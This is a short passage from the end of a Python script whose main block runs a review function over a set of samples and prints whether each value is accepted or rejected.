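if __name__ == "__main__":
    for value, accepted in review(SAMPLES):
        print("accept" if accepted else "reject", repr(value))
```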